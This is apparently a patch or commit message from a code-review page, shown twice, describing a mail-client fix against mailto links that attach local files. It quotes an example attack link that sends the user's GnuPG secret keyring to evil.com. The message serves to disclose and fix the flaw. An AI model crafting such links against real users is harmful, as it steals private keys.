This allows attacker to extract secrets from users:
mailto:sid@evil.com?attach=/.gnupg/secring.gpg
See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 and #177
Signed-off-by: Jörg Thalheim joerg@thalheim.io
Due to an influx of spam, we have had to impose restrictions on new accounts. Please see this wiki page for instructions on how to get full permissions. Sorry for the inconvenience.
This allows attacker to extract secrets from users:
mailto:sid@evil.com?attach=/.gnupg/secring.gpg
See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 and #177
Signed-off-by: Jörg Thalheim joerg@thalheim.io